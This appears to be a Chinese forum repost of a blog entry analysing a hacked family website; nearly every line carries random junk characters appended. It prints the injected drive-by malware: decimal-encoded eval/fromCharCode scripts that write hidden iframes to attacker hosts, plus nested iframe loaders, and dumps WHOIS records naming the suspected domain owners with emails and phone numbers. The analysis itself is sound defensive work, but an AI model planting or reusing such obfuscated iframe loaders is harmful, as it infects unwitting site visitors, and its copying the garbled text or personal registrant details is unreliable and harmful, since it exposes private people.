[原创]一篇刚写的分析木马手记

首发在我的博客里面， D$SO 6X~  
L
'a>D  
http://www.areway.cn/?p=175 eb<'>a  
q,(hs]\@  
Do;rY\sY  
周末上线鸭子就Q我说他的站给挂了马，当时没太注意就直接打开了连接，截下了网页源码： v9Ez0 :)  
          ;T WYO  
<script>t=’60,105,102,114,97,109,101, RueL~$*6.~  
32,115,114,99,61,104,116,116,112,58,47,47, k?=_p6>  
102,114,101,101,46,117,45,117,117,117,46,99, iD2>-yf  
110,47,101,114,114,111,114,46,104,116,109, :#UN^"(m}  
32,119,105,100,116,104,61,49,48,48,32,104, n/IDq$/P  
101,105,103,104,116,61,48,62,60,47,105,102, ="]y^&(L(  
114,97,109,101,62′; Zy >W2(<  
t=eval(’String.fromCharCode(’+t+’)');document.write(t);</script> IF|%.%I$!U  
                                                                                                  6}PoBhgSg-  
<script>t=’60,105,102,114,97,109,101,32,115, YQ5d!a.  
114,99,61,104,116,116,112,58,47,47,102,114, ; J8 25CE  
101,101,46,117,45,117,117,117,46,99,110,47, H/O
v8|  
101,114,114,111,114,46,104,116,109,32,119, eh$T 3_#q  
105,100,116,104,61,49,48,48,32,104,101,105, +#ANc;2g  
103,104,116,61,48,62,60,47,105,102,114,97, O)G^VD s  
109,101,62′;t=eval(’String.fromCharCode(’+t+’)'); xsXf_gGu  
document.write(t);</script> r$-]NYPi  
                                                                                                  sTO9>~sj  
<html xmlns=” 5[$jrG\!  
http://www.w3.org/1999/xhtml GZ/vUe  
“> !,>9?(  
<head> Le}-F{~`^  
<!– Published By Newasp.cc 2007-12-7-18:03:23 –> @0q*50  
<meta http-equiv=”Content-Type” content=”text/html; charset=gb2312″ /> B!z5P"C(~  
<title>首页 - 爱生活家庭网 Hsz).u  
                                                                                                                                                    )F4P-u  
上面有一段 script的十进制加密字段，里面的大概内容是，把所有的字符放在函数t里面，最后用doucment.write(t)来把字符串写在网页里面。 XRR`GBI  
转换字符串后的大概内容是（谁点击后果自付）： @60/IE{-v  
<script>t=’<iframe src=http://free.u-uuu.cn/error.htm width=……… f}F   
                                                                                                                                  .=4k'99,  
查询玉米u-uuu.cn的详细信息： z[ ml;?  
Domain Name: u-uuu.cn "WHt9 yZ  
ROID: 20070901s10001s64972306-cn +46?+kKt  
Domain Status: ok #:3~I  
Registrant Organization: 王雷 `=cOTn52  
Registrant Name: 王雷 &c
1zEgl  
Administrative Email: czlovexs@126.com 0^rDf L  
Sponsoring Registrar: 北京万网志成科技有限公司 au 5qbP  
Name Server:ns.yovole.com >0qe*4n|M  
Name Server:ns1.yovole.com yjxv D  
Registration Date: 2007-09-01 17:54 O<?z\yBtS^  
Expiration Date: 2008-09-01 17:54 u|]`
gsFZ\  
最后PING了一下地址 都没有什么…. S^4T#/  
                                                                                                )S6"I  
上虚拟机里面继续分析，IE里面打开上面的连接…查看源代码…..直接又有嵌套. #q%V|Ajq  
<iframe src=http://www.foafau.info/ms15.htm width=1 height=1></iframe> x4vowF  
<script language=”javascript” src=” gT~Yn~~b  
http://count43.51yes.com/click.aspx?id=4333375720&logo=6″></script !*l5%H  
> )w++cC4/5  
这个玉米应该有可能是木马作者的： !q_fcd^c
 
foafau.info的详细信息： CA{(x(W\:  
Access to INFO WHOIS information is provided to assist persons in N/&t)7  
determining the contents of a domain name registration record in the u$?t |Ll  
Afilias registry database. The data in this record is provided by 6:vdo~  
Afilias Limited for informational purposes only, and Afilias does not 2{o eJ  
guarantee its accuracy.  This service is intended only for query-based i+HHOT  
access. You agree that you will use this data only for lawful purposes B> LL *  
and that, under no circumstances will you use this data to: (a) allow, k3wAbGp  
enable, or otherwise support the transmission by e-mail, telephone, or oCftI':@  
facsimile of mass unsolicited, commercial advertising or solicitations $pg1Av7l  
to entities other than the data recipient’s own existing customers; or `upxM0gc  
(b) enable high volume, automated, electronic processes that send A(Ss:7({  
queries or data to the systems of Registry Operator, a Registrar, or u9}k^W)E  
Afilias except as reasonably necessary to register domain names or Iq[Z5k(K  
modify existing registrations. All rights reserved. Afilias reserves g$jZpU  
the right to modify these terms at any time. By submitting this query, R2[-Q"|Ra  
you agree to abide by this policy. b];p/V# <  
Domain ID:D22418703-LRMS 7#BUd/  
Domain Name:FOAFAU.INFO qOk=:1`3  
Created On:20-Nov-2007 16:05:42 UTC (n,!
v)  
Last Updated On:20-Nov-2007 16:05:44 UTC x)<Hr,wd  
Expiration Date:20-Nov-2008 16:05:42 UTC F};G&  
Sponsoring Registrar:GoDaddy.com Inc. (R171-LRMS)
Tp7slKc0p  
Status:CLIENT DELETE PROHIBITED _v9P0W^.7  
Status:CLIENT RENEW PROHIBITED \Y{^Q7!>:8  
Status:CLIENT TRANSFER PROHIBITED lp;=f  
Status:CLIENT UPDATE PROHIBITED QP{V  
Status:TRANSFER PROHIBITED WTcrfs)T  
Registrant ID:GODA-040110615 _s_%}8
o  
Registrant Name:liu hong DJmT]Q]o)  
Registrant Organization: _26<}&]b*  
Registrant Street1:beijing *N;# _0)/  
Registrant Street2: /M1 /  
Registrant Street3: O*ql!9}E{  
Registrant City:beijing  H?(I-vO  
Registrant State/Province: oe
8six
Z[  
Registrant Postal Code:100000 8JU9Qb]L'I  
Registrant Country:CN 6?3f+=e"~!  
Registrant Phone:+86.860108888777 }smPP*  
Registrant Phone Ext.: 2C!Ko"1Y'  
Registrant FAX: jd]YKaI  
Registrant FAX Ext.: dt -=7mz#  
Registrant Email:bbbshiji@163.com .cV<(J 5o  
Admin ID:GODA-240110615 #0WGSIht<  
Admin Name:liu hong H.HXwN/x  
Admin Organization: o"Dk`L2  
Admin Street1:beijing H7xyK  
Admin Street2: "0(H! }D  
Admin Street3: ue5C ]  
Admin City:beijing 8~=<!(M)m/  
Admin State/Province: _^2rRz  
Admin Postal Code:100000 9"=1 O  
Admin Country:CN 'V=i;2mB*  
Admin Phone:+86.860108888777 f
+/AD  
Admin Phone Ext.: )e$}sw{t  
Admin FAX: ._uXK[c7P  
Admin FAX Ext.: 6,707h  
Admin Email:bbbshiji@163.com tf VK  
Billing ID:GODA-340110615 P,|%7'?Y  
Billing Name:liu hong c/G4@D>  
Billing Organization: t4R
I%m\  
Billing Street1:beijing 9\_^"5l  
Billing Street2: zJH#J=O  
Billing Street3: J 8z|ua  
Billing City:beijing BP&T|s  
Billing State/Province: xH\#:DLY  
Billing Postal Code:100000 @2LpI*]C  
Billing Country:CN 8gQg#^,(t  
Billing Phone:+86.860108888777 m0I)_R#X[  
Billing Phone Ext.: m5wfQ_}}ss  
Billing FAX: :6 , `M,  
Billing FAX Ext.: H+ P&} 3  
Billing Email:bbbshiji@163.com WRa4g  
Tech ID:GODA-140110615 y_>l'{w3^  
Tech Name:liu hong "~1{|lj|)  
Tech Organization: 4@iMGYR9!s  
Tech Street1:beijing &tNnW  
Tech Street2: Z
%Kkh2-uh  
Tech Street3: 1Mftq4nq  
Tech City:beijing o =oXL2}  
Tech State/Province: PQu_]cXI  
Tech Postal Code:100000 E%[2NsOM]  
Tech Country:CN {Dc{e5K  
Tech Phone:+86.860108888777 k10g %K4g  
Tech Phone Ext.: f,jN"  
Tech FAX: FZvh]ZX  
Tech FAX Ext.: I@$cw
3  
Tech Email:bbbshiji@163.com  {"RUiL^  
Name Server:NS27.DOMAINCONTROL.COM 5f~49(v]  
Name Server:NS28.DOMAINCONTROL.COM UABaS(f3  
Name Server: ~t>i+{JKE  
Name Server: %nRz~3X|+v  
Name Server: DOsQVdH  
Name Server: \ah.@s  
Name Server: 1}7Q2Ad w  
Name Server: jc$gy`,F  
Name Server: W Ai91K@  
Name Server: ^69ZX61vt  
Name Server: kH.W17D~  
Name Server: IO@Ti(,  
Name Server: R_vF$X'Ow  
                                                                                                          ?2q;`Nb  
接着下载每个文件里面的代码： +Fk]hCL  
一步一步看.. F['<;}  
l_ES$%d  
~S85+OJ;M  
u ? }T)B  
x%Fy1.  
+o4W8f=Ga  
都是十进制的代码，也懒得再分析了，有这个爱好的大家可以继续试试

要是有全部 就好了 传上来

看过了就是没看懂。。。